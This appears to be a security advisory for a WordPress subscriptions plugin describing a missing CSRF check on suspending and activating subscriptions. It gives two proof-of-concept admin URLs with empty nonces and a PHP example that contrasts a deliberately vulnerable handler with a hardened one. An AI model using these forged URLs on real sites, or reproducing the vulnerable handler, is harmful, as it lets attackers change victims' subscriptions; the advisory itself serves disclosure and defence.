Description: The plugin does not perform a CSRF check when suspending and activating subscriptions. An attacker could therefore make a logged-in admin suspend or activate an arbitrary subscription via a CSRF attack.
Deactivate subscription with ID 53: https://example.com/wp-admin/edit.php?s=&post_status=all&post_type=shop_subscription&_wpnonce=&_wp_http_referer=&action=on-hold&m=0&_wcs_product=&_payment_method=&_customer_user=&paged=1&post[]=53&action2=on-hold

Activate subscription with ID 53: https://example.com/wp-admin/edit.php?post_type=shop_subscription&marked_on-hold=1&changed=1&ids=53&post=53&_wpnonce=&action=active
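The root cause is a status-change handler that acts on request parameters without verifying the nonce that WordPress attaches to its list-table bulk actions (note the empty `_wpnonce=` in the URLs above). The following is an added illustration, not the plugin's own code: a hypothetical handler in its vulnerable form beside a hardened form that verifies the `bulk-posts` nonce emitted by the edit.php list table and the user's capability. All function names prefixed `example_` are assumed.

```php
<?php
// Added example (not the plugin's code). A hypothetical handler hooked on
// edit.php that changes a shop_subscription's status from a bulk action.

// Vulnerable pattern: trusts $_GET with no nonce or capability check, so a
// forged link opened by a logged-in admin changes the subscription state.
function example_handle_status_change_vulnerable() {
    if ( empty( $_GET['action'] ) || 'shop_subscription' !== ( $_GET['post_type'] ?? '' ) ) {
        return;
    }
    $ids = array_map( 'absint', (array) ( $_GET['post'] ?? array() ) );
    foreach ( $ids as $id ) {
        example_set_subscription_status( $id, sanitize_key( $_GET['action'] ) );
    }
}

// Hardened pattern: the request must carry the nonce WordPress generates for
// the list-table bulk form ('bulk-posts'), the action must be one we expect,
// and the user must be allowed to edit each affected post.
// check_admin_referer() dies on a missing or invalid nonce, which is the
// check the advisory says is absent.
function example_handle_status_change_hardened() {
    if ( empty( $_GET['action'] ) || 'shop_subscription' !== ( $_GET['post_type'] ?? '' ) ) {
        return;
    }
    check_admin_referer( 'bulk-posts' );
    $action = sanitize_key( wp_unslash( $_GET['action'] ) );
    if ( ! in_array( $action, array( 'active', 'on-hold' ), true ) ) {
        return;
    }
    $ids = array_map( 'absint', (array) ( $_GET['post'] ?? array() ) );
    foreach ( $ids as $id ) {
        if ( ! $id || ! current_user_can( 'edit_post', $id ) ) {
            continue; // skip ids the current user may not modify
        }
        example_set_subscription_status( $id, $action );
    }
}

// Placeholder for the status transition; the plugin's real API is not shown
// on this page, so the body only records the new status as post meta.
function example_set_subscription_status( $id, $status ) {
    update_post_meta( $id, '_example_subscription_status', $status );
}

add_action( 'load-edit.php', 'example_handle_status_change_hardened' );
```

The single-item activation URL on the page uses a different parameter set (`post=53&action=active`); a handler for that path needs the same `check_admin_referer()` call with whatever nonce action the form that generates the link uses.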
| CPE | Name | Operator | Version |
|---|---|---|---|
|  |  | eq | 4.9.0 |